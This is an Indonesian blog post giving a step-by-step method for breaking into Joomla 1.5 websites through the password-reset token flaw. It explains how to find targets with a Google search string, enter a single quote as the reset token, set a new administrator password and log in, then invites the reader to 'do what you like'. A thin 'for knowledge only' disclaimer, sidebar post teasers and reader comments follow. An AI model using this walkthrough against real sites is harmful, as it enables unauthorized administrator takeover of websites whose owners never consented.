Joomla merupakan salah satu content management system (CMS) yang cukup populer. Namun, Joomla terbaru, versi 1.5, memiliki celah keamanan yang cukup fatal. Polanya sama dengan SQL Injection yang relatif kuno. SQL Injection juga pernah dipake xnuxer untuk membobol situs Komisi Pemilihan umum (KPU) beberapa tahun lampau.
Berikut ini cara-cara membobol situs berbasis Joomla 1.5.
1. Buka alamat target yang menggunakan Joomla 1.5. Anda bisa menemukan di Google dengan mengetikkan “by Joomla 1.5? di kolom pencrian. Sebab, secara default, kalimat ini ada dalam setiap footer situs berbasis Joomla 1.5.
2. Tambahkan baris di bawah ini setelah alamat target.
index.php?option=com_user&view=reset&layout=confirm
Menjadi:
target.com/index.php?option=com_user&view=reset&layout=confirm
2. Tuliskan pada kolom “token” karakter ‘ dan klik OK.
3. Isi password baru untuk admin.
4. Buka halaman target.com/administrator/.
5. Login admin dengan password baru.
6. Lakukan yang Anda suka secara bertanggung jawab.
Cara ini terjadi karena kesalahan coding pada file /components/com_user/models/reset.php dan /components/com_user/models/controller.php.
Posting ini hanya untuk pengetahuan. Segala bentuk penyalahgunaaan adalah tanggung jawab masing-masing orang.
Forgot username : target.com/index.php?option=com_user&view=remind
Forgot password : target.com/index.php?option=com_user&view=reset
register : target.com/index.php?option=com_user&view=register
All about computer, internet and blogging tips trick
Popular Posts
-
Windows XP Fire Edition 2011 dengan Service Pack 3 ini adalah OS terbaru buatan dari Bassem Galal, yang mana Windows XP modifikasi perpadu...
-
[caption id="attachment_715" align="alignright" width="300"] Web Hosting[/caption] Ada yang sedang mencari ho...
-
Kerusakan pada monitor yang banyak macamnya, sebaiknya diketahui terlebih dulu urutan pengecekan perbaikan monitor, sehingga dalam pelaksa...
-
Hari Selasa, 24 April 2012 kemarin Google luncurkan algoritma baru yaitu ‘Google Pinguin’. Belum lagi selesai kengerian oleh google panda ...
-
Hacking ini menggunakan teknik : * Sniffing * ARP Poison Routing Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komput...
-
Google adsense for search Google Adsense For Search adalah salah satu peluang cara monetasi blog berbahasa Indonesia . Salah satu produk go...
-
Afika The Series. KUMPULAN PERCAKAPAN LUCU AFIKA OREO DENGAN BEBERAPA TOKOH TERKENAL Boink: Afikaa .. Afika: Iyaa.. Boink: Ada yg baru neh.....
-
Afikaa... | Iya | Ada yang baru nich | Apa? | Jambul Jagung | ha? Jambul Jagung? | sesuatu banget 'kan? ngekkk! Afika , si bintang iklan...
-
Selama ini, menulis kaligrafi hanya menjadi keahlian sekelompok kecil orang. Seolah-olah ketrampilan menulis kaligrafi hanya milik segelinti...
-
Di film ini juga memperkenalkan seni bela diri asli dari Indonesia, yaitu pencak silat Download Film The Raid "Serbuan Maut" - Fi...
Lek Dis Yo
Blog Temen
Diberdayakan oleh Blogger.
Copyright © 2014 Habibi Mustafa - All Rights Reserved
Template By. Catatan Info
3 Komentar untuk "MEMBOBOL WEBSITE JOOMLA"
kok gagal terus bro. Gak bisa nih
Bos para master heacker… saya minta coba di tes web ini… http://rapani-id.com/ itu saya bikin dari joomla yang udah dimodifikasi abis…. semua sript php nya.. silahkan di tes bos…. saya mau tau kelemahannya….?
salam.. by rapani Loebis
sory Gan, ane cma newbie. g bsa gtu2-an. :) :D